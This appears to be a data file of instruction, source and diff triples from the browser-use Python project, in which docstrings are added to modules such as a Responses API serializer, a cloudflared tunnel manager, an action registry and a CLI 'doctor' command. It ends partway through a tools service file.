@@ -20,6 +21,7 @@
class ResponsesAPIMessageSerializer:
+ """Serializer for converting between custom message types and OpenAI Responses API input format."""
@staticmethod
def _serialize_content_part_text(part: ContentPartTextParam) -> ResponseInputTextParam:
@@ -37,6 +39,7 @@ def _serialize_user_content(
content: str | list[ContentPartTextParam | ContentPartImageParam],
) -> str | ResponseInputMessageContentListParam:
+ """Serialize content for user messages (text and images allowed)."""
if isinstance(content, str):
return content
@@ -52,6 +55,7 @@ def _serialize_system_content(
content: str | list[ContentPartTextParam],
) -> str | ResponseInputMessageContentListParam:
+ """Serialize content for system messages (text only)."""
if isinstance(content, str):
return content
@@ -65,6 +69,7 @@ def _serialize_assistant_content(
content: str | list[ContentPartTextParam | ContentPartRefusalParam] | None,
) -> str | ResponseInputMessageContentListParam | None:
+ """Serialize content for assistant messages (text only for Responses API)."""
if content is None:
return None
if isinstance(content, str):
@@ -93,6 +98,7 @@
@staticmethod
def serialize(message: BaseMessage) -> EasyInputMessageParam:
+ """Serialize a custom message to an OpenAI Responses API input message param."""
if isinstance(message, UserMessage):
return EasyInputMessageParam(
@@ -132,4 +138,5 @@
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[EasyInputMessageParam]:
- return [ResponsesAPIMessageSerializer.serialize(m) for m in messages]+ """Serialize a list of messages to Responses API input format."""
+ return [ResponsesAPIMessageSerializer.serialize(m) for m in messages]
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/openai/responses_serializer.py |
Generate docstrings for each module |
import asyncio
import json
import logging
import os
import re
import shutil
import signal
from pathlib import Path
from typing import Any
logger = logging.getLogger(__name__)
# Pattern to extract tunnel URL from cloudflared output
_URL_PATTERN = re.compile(r'(https://\S+\.trycloudflare\.com)')
# Directory for tunnel PID files
_TUNNELS_DIR = Path.home() / '.browser-use' / 'tunnels'
class TunnelManager:
def __init__(self) -> None:
self._binary_path: str | None = None
def get_binary_path(self) -> str:
# Cached result from previous call
if self._binary_path:
return self._binary_path
# Check system installation
system_binary = shutil.which('cloudflared')
if system_binary:
logger.info('Using cloudflared: %s', system_binary)
self._binary_path = system_binary
return system_binary
# Not found
raise RuntimeError(
'cloudflared not installed.\n\n'
'Install cloudflared:\n'
' macOS: brew install cloudflared\n'
' Linux: curl -L https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 -o ~/.local/bin/cloudflared && chmod +x ~/.local/bin/cloudflared\n'
' Windows: winget install Cloudflare.cloudflared\n\n'
'Or re-run install.sh which installs cloudflared automatically.\n\n'
'Then retry: browser-use tunnel <port>'
)
def is_available(self) -> bool:
if self._binary_path:
return True
return shutil.which('cloudflared') is not None
def get_status(self) -> dict[str, Any]:
system_binary = shutil.which('cloudflared')
if system_binary:
return {
'available': True,
'source': 'system',
'path': system_binary,
'note': 'cloudflared installed',
}
return {
'available': False,
'source': None,
'path': None,
'note': 'cloudflared not installed - run install.sh or install manually',
}
# Global singleton instance
_tunnel_manager: TunnelManager | None = None
def get_tunnel_manager() -> TunnelManager:
global _tunnel_manager
if _tunnel_manager is None:
_tunnel_manager = TunnelManager()
return _tunnel_manager
# =============================================================================
# PID File Management
# =============================================================================
def _get_tunnel_file(port: int) -> Path:
return _TUNNELS_DIR / f'{port}.json'
def _save_tunnel_info(port: int, pid: int, url: str) -> None:
_TUNNELS_DIR.mkdir(parents=True, exist_ok=True)
_get_tunnel_file(port).write_text(json.dumps({'port': port, 'pid': pid, 'url': url}))
def _load_tunnel_info(port: int) -> dict[str, Any] | None:
tunnel_file = _get_tunnel_file(port)
if not tunnel_file.exists():
return None
try:
info = json.loads(tunnel_file.read_text())
pid = info.get('pid')
if pid and _is_process_alive(pid):
return info
# Process dead, clean up stale file
tunnel_file.unlink(missing_ok=True)
return None
except (json.JSONDecodeError, OSError):
tunnel_file.unlink(missing_ok=True)
return None
def _delete_tunnel_info(port: int) -> None:
_get_tunnel_file(port).unlink(missing_ok=True)
def _is_process_alive(pid: int) -> bool:
try:
os.kill(pid, 0)
return True
except (OSError, ProcessLookupError):
return False
def _kill_process(pid: int) -> bool:
try:
os.kill(pid, signal.SIGTERM)
# Give it a moment to terminate gracefully
for _ in range(10):
if not _is_process_alive(pid):
return True
import time
time.sleep(0.1)
# Force kill if still alive
os.kill(pid, signal.SIGKILL)
return True
except (OSError, ProcessLookupError):
return False
# =============================================================================
# Standalone Tunnel Functions (no browser session required)
# =============================================================================
async def start_tunnel(port: int) -> dict[str, Any]:
# Check if tunnel already exists for this port
existing = _load_tunnel_info(port)
if existing:
return {'url': existing['url'], 'port': port, 'existing': True}
# Get cloudflared binary
try:
tunnel_manager = get_tunnel_manager()
cloudflared_binary = tunnel_manager.get_binary_path()
except RuntimeError as e:
return {'error': str(e)}
# Create log file for cloudflared stderr (avoids SIGPIPE when parent exits)
_TUNNELS_DIR.mkdir(parents=True, exist_ok=True)
log_file_path = _TUNNELS_DIR / f'{port}.log'
log_file = open(log_file_path, 'w') # noqa: ASYNC230
# Spawn cloudflared as a daemon
# - start_new_session=True: survives parent exit
# - stderr to file: avoids SIGPIPE when parent's pipe closes
process = await asyncio.create_subprocess_exec(
cloudflared_binary,
'tunnel',
'--url',
f'http://localhost:{port}',
stdout=asyncio.subprocess.DEVNULL,
stderr=log_file,
start_new_session=True,
)
# Poll the log file until we find the tunnel URL
url: str | None = None
try:
import time
deadline = time.time() + 15
while time.time() < deadline:
# Check if process died
if process.returncode is not None:
log_file.close()
content = log_file_path.read_text() if log_file_path.exists() else ''
return {'error': f'cloudflared exited unexpectedly: {content[:500]}'}
# Read log file content
try:
content = log_file_path.read_text()
match = _URL_PATTERN.search(content)
if match:
url = match.group(1)
break
except OSError:
pass
await asyncio.sleep(0.2)
except Exception as e:
process.terminate()
log_file.close()
return {'error': f'Failed to start tunnel: {e}'}
if url is None:
process.terminate()
log_file.close()
return {'error': 'Timed out waiting for cloudflare tunnel URL (15s)'}
# Close log file handle to avoid leaking file descriptors
log_file.close()
# Save tunnel info to disk so it persists across CLI invocations
_save_tunnel_info(port, process.pid, url)
logger.info(f'Tunnel started: localhost:{port} -> {url} (pid={process.pid})')
return {'url': url, 'port': port}
def list_tunnels() -> dict[str, Any]:
tunnels = []
if _TUNNELS_DIR.exists():
for tunnel_file in _TUNNELS_DIR.glob('*.json'):
try:
port = int(tunnel_file.stem)
info = _load_tunnel_info(port)
if info:
tunnels.append({'port': info['port'], 'url': info['url']})
except (ValueError, json.JSONDecodeError):
continue
return {'tunnels': tunnels, 'count': len(tunnels)}
async def stop_tunnel(port: int) -> dict[str, Any]:
info = _load_tunnel_info(port)
if not info:
return {'error': f'No tunnel running on port {port}'}
url = info['url']
pid = info['pid']
_kill_process(pid)
_delete_tunnel_info(port)
# Clean up log file
log_file = _TUNNELS_DIR / f'{port}.log'
log_file.unlink(missing_ok=True)
logger.info(f'Tunnel stopped: localhost:{port}')
return {'stopped': port, 'url': url}
async def stop_all_tunnels() -> dict[str, Any]:
stopped = []
if _TUNNELS_DIR.exists():
for tunnel_file in _TUNNELS_DIR.glob('*.json'):
try:
port = int(tunnel_file.stem)
result = await stop_tunnel(port)
if 'stopped' in result:
stopped.append(port)
except ValueError:
continue
return {'stopped': stopped, 'count': len(stopped)} | --- +++ @@ -1,3 +1,15 @@+"""Cloudflared tunnel binary management.
+
+This module manages the cloudflared binary for tunnel support.
+Cloudflared must be installed via install.sh or manually by the user.
+
+Tunnels are managed independently of browser sessions - they are purely
+a network utility for exposing local ports via Cloudflare quick tunnels.
+
+Tunnels survive CLI process exit by:
+1. Spawning cloudflared as a daemon (start_new_session=True)
+2. Tracking tunnel info via PID files in ~/.browser-use/tunnels/
+"""
import asyncio
import json
@@ -19,11 +31,20 @@
class TunnelManager:
+ """Manages cloudflared binary location."""
def __init__(self) -> None:
self._binary_path: str | None = None
def get_binary_path(self) -> str:
+ """Get cloudflared binary path.
+
+ Returns:
+ Absolute path to cloudflared binary
+
+ Raises:
+ RuntimeError: If cloudflared is not installed
+ """
# Cached result from previous call
if self._binary_path:
return self._binary_path
@@ -47,11 +68,13 @@ )
def is_available(self) -> bool:
+ """Check if cloudflared is available."""
if self._binary_path:
return True
return shutil.which('cloudflared') is not None
def get_status(self) -> dict[str, Any]:
+ """Get tunnel capability status for doctor command."""
system_binary = shutil.which('cloudflared')
if system_binary:
return {
@@ -74,6 +97,7 @@
def get_tunnel_manager() -> TunnelManager:
+ """Get the global TunnelManager instance (singleton pattern)."""
global _tunnel_manager
if _tunnel_manager is None:
_tunnel_manager = TunnelManager()
@@ -86,15 +110,18 @@
def _get_tunnel_file(port: int) -> Path:
+ """Get the path to a tunnel's info file."""
return _TUNNELS_DIR / f'{port}.json'
def _save_tunnel_info(port: int, pid: int, url: str) -> None:
+ """Save tunnel info to disk."""
_TUNNELS_DIR.mkdir(parents=True, exist_ok=True)
_get_tunnel_file(port).write_text(json.dumps({'port': port, 'pid': pid, 'url': url}))
def _load_tunnel_info(port: int) -> dict[str, Any] | None:
+ """Load tunnel info from disk, returning None if not found or process dead."""
tunnel_file = _get_tunnel_file(port)
if not tunnel_file.exists():
return None
@@ -113,10 +140,12 @@
def _delete_tunnel_info(port: int) -> None:
+ """Delete tunnel info file."""
_get_tunnel_file(port).unlink(missing_ok=True)
def _is_process_alive(pid: int) -> bool:
+ """Check if a process is still running."""
try:
os.kill(pid, 0)
return True
@@ -125,6 +154,7 @@
def _kill_process(pid: int) -> bool:
+ """Kill a process by PID. Returns True if killed, False if already dead."""
try:
os.kill(pid, signal.SIGTERM)
# Give it a moment to terminate gracefully
@@ -147,6 +177,16 @@
async def start_tunnel(port: int) -> dict[str, Any]:
+ """Start a cloudflare quick tunnel for a local port.
+
+ The tunnel runs as a daemon process that survives CLI exit.
+
+ Args:
+ port: Local port to tunnel
+
+ Returns:
+ Dict with 'url' and 'port' on success, or 'error' on failure
+ """
# Check if tunnel already exists for this port
existing = _load_tunnel_info(port)
if existing:
@@ -222,6 +262,11 @@
def list_tunnels() -> dict[str, Any]:
+ """List active tunnels.
+
+ Returns:
+ Dict with 'tunnels' list and 'count'
+ """
tunnels = []
if _TUNNELS_DIR.exists():
for tunnel_file in _TUNNELS_DIR.glob('*.json'):
@@ -236,6 +281,14 @@
async def stop_tunnel(port: int) -> dict[str, Any]:
+ """Stop a tunnel for a specific port.
+
+ Args:
+ port: Port number to stop tunnel for
+
+ Returns:
+ Dict with 'stopped' port and 'url' on success, or 'error'
+ """
info = _load_tunnel_info(port)
if not info:
return {'error': f'No tunnel running on port {port}'}
@@ -253,6 +306,11 @@
async def stop_all_tunnels() -> dict[str, Any]:
+ """Stop all active tunnels.
+
+ Returns:
+ Dict with 'stopped' list of ports
+ """
stopped = []
if _TUNNELS_DIR.exists():
for tunnel_file in _TUNNELS_DIR.glob('*.json'):
@@ -264,4 +322,4 @@ except ValueError:
continue
- return {'stopped': stopped, 'count': len(stopped)}+ return {'stopped': stopped, 'count': len(stopped)}
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/tunnel.py |
Add docstrings for internal functions |
__all__ = ['main']
def __getattr__(name: str):
if name == 'main':
from browser_use.skill_cli.main import main
return main
raise AttributeError(f'module {__name__!r} has no attribute {name!r}') | --- +++ @@ -1,10 +1,24 @@+"""Browser-use CLI package.
+
+This package provides a fast command-line interface for browser automation.
+The CLI uses a session server architecture for persistent browser sessions.
+
+Usage:
+ browser-use open https://example.com
+ browser-use click 5
+ browser-use type "Hello World"
+ browser-use python "print(browser.url)"
+ browser-use run "Fill the contact form"
+ browser-use close
+"""
__all__ = ['main']
def __getattr__(name: str):
+ """Lazy import to avoid runpy warnings when running as module."""
if name == 'main':
from browser_use.skill_cli.main import main
return main
- raise AttributeError(f'module {__name__!r} has no attribute {name!r}')+ raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/__init__.py |
Write reusable docstrings | from collections.abc import Callable
from typing import TYPE_CHECKING, Any
from pydantic import BaseModel, ConfigDict
from browser_use.browser import BrowserSession
from browser_use.filesystem.file_system import FileSystem
from browser_use.llm.base import BaseChatModel
if TYPE_CHECKING:
pass
class RegisteredAction(BaseModel):
name: str
description: str
function: Callable
param_model: type[BaseModel]
# If True, this action is known to change the page (e.g. navigate, search, go_back, switch).
# multi_act() will abort remaining queued actions after executing a terminates_sequence action.
terminates_sequence: bool = False
# filters: provide specific domains to determine whether the action should be available on the given URL or not
domains: list[str] | None = None # e.g. ['*.google.com', 'www.bing.com', 'yahoo.*]
model_config = ConfigDict(arbitrary_types_allowed=True)
def prompt_description(self) -> str:
schema = self.param_model.model_json_schema()
params = []
if 'properties' in schema:
for param_name, param_info in schema['properties'].items():
# Build parameter description
param_desc = param_name
# Add type information if available
if 'type' in param_info:
param_type = param_info['type']
param_desc += f'={param_type}'
# Add description as comment if available
if 'description' in param_info:
param_desc += f' ({param_info["description"]})'
params.append(param_desc)
# Format: action_name: Description. (param1=type, param2=type, ...)
if params:
return f'{self.name}: {self.description}. ({", ".join(params)})'
else:
return f'{self.name}: {self.description}'
class ActionModel(BaseModel):
# this will have all the registered actions, e.g.
# click_element = param_model = ClickElementParams
# done = param_model = None
#
model_config = ConfigDict(arbitrary_types_allowed=True, extra='forbid')
def get_index(self) -> int | None:
# {'clicked_element': {'index':5}}
params = self.model_dump(exclude_unset=True).values()
if not params:
return None
for param in params:
if param is not None and 'index' in param:
return param['index']
return None
def set_index(self, index: int):
# Get the action name and params
action_data = self.model_dump(exclude_unset=True)
action_name = next(iter(action_data.keys()))
action_params = getattr(self, action_name)
# Update the index directly on the model
if hasattr(action_params, 'index'):
action_params.index = index
class ActionRegistry(BaseModel):
actions: dict[str, RegisteredAction] = {}
@staticmethod
def _match_domains(domains: list[str] | None, url: str) -> bool:
if domains is None or not url:
return True
# Use the centralized URL matching logic from utils
from browser_use.utils import match_url_with_domain_pattern
for domain_pattern in domains:
if match_url_with_domain_pattern(url, domain_pattern):
return True
return False
def get_prompt_description(self, page_url: str | None = None) -> str:
if page_url is None:
# For system prompt (no URL provided), include only actions with no filters
return '\n'.join(action.prompt_description() for action in self.actions.values() if action.domains is None)
# only include filtered actions for the current page URL
filtered_actions = []
for action in self.actions.values():
if not action.domains:
# skip actions with no filters, they are already included in the system prompt
continue
# Check domain filter
if self._match_domains(action.domains, page_url):
filtered_actions.append(action)
return '\n'.join(action.prompt_description() for action in filtered_actions)
class SpecialActionParameters(BaseModel):
model_config = ConfigDict(arbitrary_types_allowed=True)
# optional user-provided context object passed down from Agent(context=...)
# e.g. can contain anything, external db connections, file handles, queues, runtime config objects, etc.
# that you might want to be able to access quickly from within many of your actions
# browser-use code doesn't use this at all, we just pass it down to your actions for convenience
context: Any | None = None
# browser-use session object, can be used to create new tabs, navigate, access CDP
browser_session: BrowserSession | None = None
# Current page URL for filtering and context
page_url: str | None = None
# CDP client for direct Chrome DevTools Protocol access
cdp_client: Any | None = None # CDPClient type from cdp_use
# extra injected config if the action asks for these arg names
page_extraction_llm: BaseChatModel | None = None
file_system: FileSystem | None = None
available_file_paths: list[str] | None = None
has_sensitive_data: bool = False
extraction_schema: dict | None = None
@classmethod
def get_browser_requiring_params(cls) -> set[str]:
return {'browser_session', 'cdp_client', 'page_url'} | --- +++ @@ -12,6 +12,7 @@
class RegisteredAction(BaseModel):
+ """Model for a registered action"""
name: str
description: str
@@ -28,6 +29,7 @@ model_config = ConfigDict(arbitrary_types_allowed=True)
def prompt_description(self) -> str:
+ """Get a description of the action for the prompt in unstructured format"""
schema = self.param_model.model_json_schema()
params = []
@@ -55,6 +57,7 @@
class ActionModel(BaseModel):
+ """Base model for dynamically created action models"""
# this will have all the registered actions, e.g.
# click_element = param_model = ClickElementParams
@@ -63,6 +66,7 @@ model_config = ConfigDict(arbitrary_types_allowed=True, extra='forbid')
def get_index(self) -> int | None:
+ """Get the index of the action"""
# {'clicked_element': {'index':5}}
params = self.model_dump(exclude_unset=True).values()
if not params:
@@ -73,6 +77,7 @@ return None
def set_index(self, index: int):
+ """Overwrite the index of the action"""
# Get the action name and params
action_data = self.model_dump(exclude_unset=True)
action_name = next(iter(action_data.keys()))
@@ -84,11 +89,22 @@
class ActionRegistry(BaseModel):
+ """Model representing the action registry"""
actions: dict[str, RegisteredAction] = {}
@staticmethod
def _match_domains(domains: list[str] | None, url: str) -> bool:
+ """
+ Match a list of domain glob patterns against a URL.
+
+ Args:
+ domains: A list of domain patterns that can include glob patterns (* wildcard)
+ url: The URL to match against
+
+ Returns:
+ True if the URL's domain matches the pattern, False otherwise
+ """
if domains is None or not url:
return True
@@ -102,6 +118,16 @@ return False
def get_prompt_description(self, page_url: str | None = None) -> str:
+ """Get a description of all actions for the prompt
+
+ Args:
+ page_url: If provided, filter actions by URL using domain filters.
+
+ Returns:
+ A string description of available actions.
+ - If page is None: return only actions with no page_filter and no domains (for system prompt)
+ - If page is provided: return only filtered actions that match the current page (excluding unfiltered actions)
+ """
if page_url is None:
# For system prompt (no URL provided), include only actions with no filters
return '\n'.join(action.prompt_description() for action in self.actions.values() if action.domains is None)
@@ -121,6 +147,7 @@
class SpecialActionParameters(BaseModel):
+ """Model defining all special parameters that can be injected into actions"""
model_config = ConfigDict(arbitrary_types_allowed=True)
@@ -148,4 +175,5 @@
@classmethod
def get_browser_requiring_params(cls) -> set[str]:
- return {'browser_session', 'cdp_client', 'page_url'}+ """Get parameter names that require browser_session"""
+ return {'browser_session', 'cdp_client', 'page_url'}
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tools/registry/views.py |
Add docstrings to meet PEP guidelines |
import logging
from typing import Any
logger = logging.getLogger(__name__)
COMMANDS = {'doctor'}
async def handle() -> dict[str, Any]:
checks: dict[str, dict[str, Any]] = {}
# 1. Package installation
checks['package'] = _check_package()
# 2. Browser availability
checks['browser'] = _check_browser()
# 3. API key configuration
checks['api_key'] = _check_api_key_config()
# 4. Cloudflared availability
checks['cloudflared'] = _check_cloudflared()
# 5. Network connectivity (basic check)
checks['network'] = await _check_network()
# Determine overall status
all_ok = all(check.get('status') == 'ok' for check in checks.values())
return {
'status': 'healthy' if all_ok else 'issues_found',
'checks': checks,
'summary': _summarize_checks(checks),
}
def _check_package() -> dict[str, Any]:
try:
import browser_use
version = getattr(browser_use, '__version__', 'unknown')
return {
'status': 'ok',
'message': f'browser-use {version}',
}
except ImportError:
return {
'status': 'error',
'message': 'browser-use not installed',
'fix': 'pip install browser-use',
}
def _check_browser() -> dict[str, Any]:
try:
from browser_use.browser.profile import BrowserProfile
# Just check if we can import and create a profile
profile = BrowserProfile(headless=True)
return {
'status': 'ok',
'message': 'Browser profile available',
}
except Exception as e:
return {
'status': 'warning',
'message': f'Browser may not be available: {e}',
'note': 'Will be installed on first use',
}
def _check_api_key_config() -> dict[str, Any]:
from browser_use.skill_cli.api_key import check_api_key
status = check_api_key()
if status['available']:
return {
'status': 'ok',
'message': f'API key configured ({status["source"]})',
}
else:
return {
'status': 'missing',
'message': 'No API key configured',
'note': 'Required for remote browser. Get one at https://browser-use.com/new-api-key',
}
def _check_cloudflared() -> dict[str, Any]:
from browser_use.skill_cli.tunnel import get_tunnel_manager
tunnel_mgr = get_tunnel_manager()
status_info = tunnel_mgr.get_status()
if status_info['available']:
return {
'status': 'ok',
'message': f'Cloudflared available ({status_info["source"]})',
'note': status_info.get('note'),
}
else:
return {
'status': 'missing',
'message': 'Cloudflared not available',
'note': 'Will be auto-installed on first tunnel use',
}
async def _check_network() -> dict[str, Any]:
try:
import httpx
async with httpx.AsyncClient(timeout=5.0) as client:
# Just ping a reliable endpoint
response = await client.head('https://api.github.com', follow_redirects=True)
if response.status_code < 500:
return {
'status': 'ok',
'message': 'Network connectivity OK',
}
except Exception as e:
logger.debug(f'Network check failed: {e}')
return {
'status': 'warning',
'message': 'Network connectivity check inconclusive',
'note': 'Some features may not work offline',
}
def _summarize_checks(checks: dict[str, dict[str, Any]]) -> str:
ok = sum(1 for c in checks.values() if c.get('status') == 'ok')
warning = sum(1 for c in checks.values() if c.get('status') == 'warning')
error = sum(1 for c in checks.values() if c.get('status') == 'error')
missing = sum(1 for c in checks.values() if c.get('status') == 'missing')
total = len(checks)
parts = [f'{ok}/{total} checks passed']
if warning > 0:
parts.append(f'{warning} warnings')
if error > 0:
parts.append(f'{error} errors')
if missing > 0:
parts.append(f'{missing} missing')
return ', '.join(parts) | --- +++ @@ -1,3 +1,8 @@+"""Doctor command - check installation and dependencies.
+
+Validates that browser-use is properly installed and all dependencies
+are available. Provides helpful diagnostic information and fixes.
+"""
import logging
from typing import Any
@@ -8,6 +13,7 @@
async def handle() -> dict[str, Any]:
+ """Run health checks and return results."""
checks: dict[str, dict[str, Any]] = {}
# 1. Package installation
@@ -36,6 +42,7 @@
def _check_package() -> dict[str, Any]:
+ """Check if browser-use is installed."""
try:
import browser_use
@@ -53,6 +60,7 @@
def _check_browser() -> dict[str, Any]:
+ """Check if browser is available."""
try:
from browser_use.browser.profile import BrowserProfile
@@ -71,6 +79,7 @@
def _check_api_key_config() -> dict[str, Any]:
+ """Check if API key is configured."""
from browser_use.skill_cli.api_key import check_api_key
status = check_api_key()
@@ -88,6 +97,7 @@
def _check_cloudflared() -> dict[str, Any]:
+ """Check if cloudflared is available."""
from browser_use.skill_cli.tunnel import get_tunnel_manager
tunnel_mgr = get_tunnel_manager()
@@ -108,6 +118,7 @@
async def _check_network() -> dict[str, Any]:
+ """Check basic network connectivity."""
try:
import httpx
@@ -130,6 +141,7 @@
def _summarize_checks(checks: dict[str, dict[str, Any]]) -> str:
+ """Generate a summary of check results."""
ok = sum(1 for c in checks.values() if c.get('status') == 'ok')
warning = sum(1 for c in checks.values() if c.get('status') == 'warning')
error = sum(1 for c in checks.values() if c.get('status') == 'error')
@@ -145,4 +157,4 @@ if missing > 0:
parts.append(f'{missing} missing')
- return ', '.join(parts)+ return ', '.join(parts)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/doctor.py |
Add docstrings to improve collaboration | import asyncio
import json
import logging
import os
from typing import Generic, TypeVar
import anyio
try:
from lmnr import Laminar # type: ignore
except ImportError:
Laminar = None # type: ignore
from pydantic import BaseModel
from browser_use.agent.views import ActionModel, ActionResult
from browser_use.browser import BrowserSession
from browser_use.browser.events import (
ClickCoordinateEvent,
ClickElementEvent,
CloseTabEvent,
GetDropdownOptionsEvent,
GoBackEvent,
NavigateToUrlEvent,
ScrollEvent,
ScrollToTextEvent,
SendKeysEvent,
SwitchTabEvent,
TypeTextEvent,
UploadFileEvent,
)
from browser_use.browser.views import BrowserError
from browser_use.dom.service import EnhancedDOMTreeNode
from browser_use.filesystem.file_system import FileSystem
from browser_use.llm.base import BaseChatModel
from browser_use.llm.messages import SystemMessage, UserMessage
from browser_use.observability import observe_debug
from browser_use.tools.registry.service import Registry
from browser_use.tools.utils import get_click_description
from browser_use.tools.views import (
ClickElementAction,
ClickElementActionIndexOnly,
CloseTabAction,
DoneAction,
ExtractAction,
FindElementsAction,
GetDropdownOptionsAction,
InputTextAction,
NavigateAction,
NoParamsAction,
SaveAsPdfAction,
ScreenshotAction,
ScrollAction,
SearchAction,
SearchPageAction,
SelectDropdownOptionAction,
SendKeysAction,
StructuredOutputAction,
SwitchTabAction,
UploadFileAction,
)
from browser_use.utils import create_task_with_error_handling, sanitize_surrogates, time_execution_sync
logger = logging.getLogger(__name__)
# Import EnhancedDOMTreeNode and rebuild event models that have forward references to it
# This must be done after all imports are complete
ClickElementEvent.model_rebuild()
TypeTextEvent.model_rebuild()
ScrollEvent.model_rebuild()
UploadFileEvent.model_rebuild()
Context = TypeVar('Context')
T = TypeVar('T', bound=BaseModel)
def _detect_sensitive_key_name(text: str, sensitive_data: dict[str, str | dict[str, str]] | None) -> str | None:
if not sensitive_data or not text:
return None
# Collect all sensitive values and their keys
for domain_or_key, content in sensitive_data.items():
if isinstance(content, dict):
# New format: {domain: {key: value}}
for key, value in content.items():
if value and value == text:
return key
elif content: # Old format: {key: value}
if content == text:
return domain_or_key
return None
def handle_browser_error(e: BrowserError) -> ActionResult:
if e.long_term_memory is not None:
if e.short_term_memory is not None:
return ActionResult(
extracted_content=e.short_term_memory, error=e.long_term_memory, include_extracted_content_only_once=True
)
else:
return ActionResult(error=e.long_term_memory)
# Fallback to original error handling if long_term_memory is None
logger.warning(
'⚠️ A BrowserError was raised without long_term_memory - always set long_term_memory when raising BrowserError to propagate right messages to LLM.'
)
raise e
# --- JS templates for search_page and find_elements ---
_SEARCH_PAGE_JS_BODY = """\
try {
var scope = CSS_SCOPE ? document.querySelector(CSS_SCOPE) : document.body;
if (!scope) {
return {error: 'CSS scope selector not found: ' + CSS_SCOPE, matches: [], total: 0};
}
var walker = document.createTreeWalker(scope, NodeFilter.SHOW_TEXT);
var fullText = '';
var nodeOffsets = [];
while (walker.nextNode()) {
var node = walker.currentNode;
var text = node.textContent;
if (text && text.trim()) {
nodeOffsets.push({offset: fullText.length, length: text.length, node: node});
fullText += text;
}
}
var re;
try {
var flags = CASE_SENSITIVE ? 'g' : 'gi';
if (IS_REGEX) {
re = new RegExp(PATTERN, flags);
} else {
re = new RegExp(PATTERN.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\$&'), flags);
}
} catch (e) {
return {error: 'Invalid regex pattern: ' + e.message, matches: [], total: 0};
}
var matches = [];
var match;
var totalFound = 0;
while ((match = re.exec(fullText)) !== null) {
totalFound++;
if (matches.length < MAX_RESULTS) {
var start = Math.max(0, match.index - CONTEXT_CHARS);
var end = Math.min(fullText.length, match.index + match[0].length + CONTEXT_CHARS);
var context = fullText.slice(start, end);
var elementPath = '';
for (var i = 0; i < nodeOffsets.length; i++) {
var no = nodeOffsets[i];
if (no.offset <= match.index && no.offset + no.length > match.index) {
elementPath = _getPath(no.node.parentElement);
break;
}
}
matches.push({
match_text: match[0],
context: (start > 0 ? '...' : '') + context + (end < fullText.length ? '...' : ''),
element_path: elementPath,
char_position: match.index
});
}
if (match[0].length === 0) re.lastIndex++;
}
return {matches: matches, total: totalFound, has_more: totalFound > MAX_RESULTS};
} catch (e) {
return {error: 'search_page error: ' + e.message, matches: [], total: 0};
}
function _getPath(el) {
var parts = [];
var current = el;
while (current && current !== document.body && current !== document) {
var desc = current.tagName ? current.tagName.toLowerCase() : '';
if (!desc) break;
if (current.id) desc += '#' + current.id;
else if (current.className && typeof current.className === 'string') {
var classes = current.className.trim().split(/\\s+/).slice(0, 2).join('.');
if (classes) desc += '.' + classes;
}
parts.unshift(desc);
current = current.parentElement;
}
return parts.join(' > ');
}
"""
_FIND_ELEMENTS_JS_BODY = """\
try {
var elements;
try {
elements = document.querySelectorAll(SELECTOR);
} catch (e) {
return {error: 'Invalid CSS selector: ' + e.message, elements: [], total: 0};
}
var total = elements.length;
var limit = Math.min(total, MAX_RESULTS);
var results = [];
for (var i = 0; i < limit; i++) {
var el = elements[i];
var item = {index: i, tag: el.tagName.toLowerCase()};
if (INCLUDE_TEXT) {
var text = (el.textContent || '').trim();
item.text = text.length > 300 ? text.slice(0, 300) + '...' : text;
}
if (ATTRIBUTES && ATTRIBUTES.length > 0) {
item.attrs = {};
for (var j = 0; j < ATTRIBUTES.length; j++) {
var val = el.getAttribute(ATTRIBUTES[j]);
if (val !== null) {
item.attrs[ATTRIBUTES[j]] = val.length > 500 ? val.slice(0, 500) + '...' : val;
}
}
}
item.children_count = el.children.length;
results.push(item);
}
return {elements: results, total: total, showing: limit};
} catch (e) {
return {error: 'find_elements error: ' + e.message, elements: [], total: 0};
}
"""
def _build_search_page_js(
pattern: str,
regex: bool,
case_sensitive: bool,
context_chars: int,
css_scope: str | None,
max_results: int,
) -> str:
params_js = (
f'var PATTERN = {json.dumps(pattern)};\n'
f'var IS_REGEX = {json.dumps(regex)};\n'
f'var CASE_SENSITIVE = {json.dumps(case_sensitive)};\n'
f'var CONTEXT_CHARS = {json.dumps(context_chars)};\n'
f'var CSS_SCOPE = {json.dumps(css_scope)};\n'
f'var MAX_RESULTS = {json.dumps(max_results)};\n'
)
return '(function() {\n' + params_js + _SEARCH_PAGE_JS_BODY + '\n})()'
def _build_find_elements_js(
selector: str,
attributes: list[str] | None,
max_results: int,
include_text: bool,
) -> str:
params_js = (
f'var SELECTOR = {json.dumps(selector)};\n'
f'var ATTRIBUTES = {json.dumps(attributes)};\n'
f'var MAX_RESULTS = {json.dumps(max_results)};\n'
f'var INCLUDE_TEXT = {json.dumps(include_text)};\n'
)
return '(function() {\n' + params_js + _FIND_ELEMENTS_JS_BODY + '\n})()'
def _format_search_results(data: dict, pattern: str) -> str:
if not isinstance(data, dict):
return f'search_page returned unexpected result: {data}'
matches = data.get('matches', [])
total = data.get('total', 0)
has_more = data.get('has_more', False)
if total == 0:
return f'No matches found for "{pattern}" on page.'
lines = [f'Found {total} match{"es" if total != 1 else ""} for "{pattern}" on page:']
lines.append('')
for i, m in enumerate(matches):
context = m.get('context', '')
path = m.get('element_path', '')
loc = f' (in {path})' if path else ''
lines.append(f'[{i + 1}] {context}{loc}')
if has_more:
lines.append(f'\n... showing {len(matches)} of {total} total matches. Increase max_results to see more.')
return '\n'.join(lines)
def _format_find_results(data: dict, selector: str) -> str:
if not isinstance(data, dict):
return f'find_elements returned unexpected result: {data}'
elements = data.get('elements', [])
total = data.get('total', 0)
showing = data.get('showing', 0)
if total == 0:
return f'No elements found matching "{selector}".'
lines = [f'Found {total} element{"s" if total != 1 else ""} matching "{selector}":']
lines.append('')
for el in elements:
idx = el.get('index', 0)
tag = el.get('tag', '?')
text = el.get('text', '')
attrs = el.get('attrs', {})
children = el.get('children_count', 0)
# Build element description
parts = [f'[{idx}] <{tag}>']
if text:
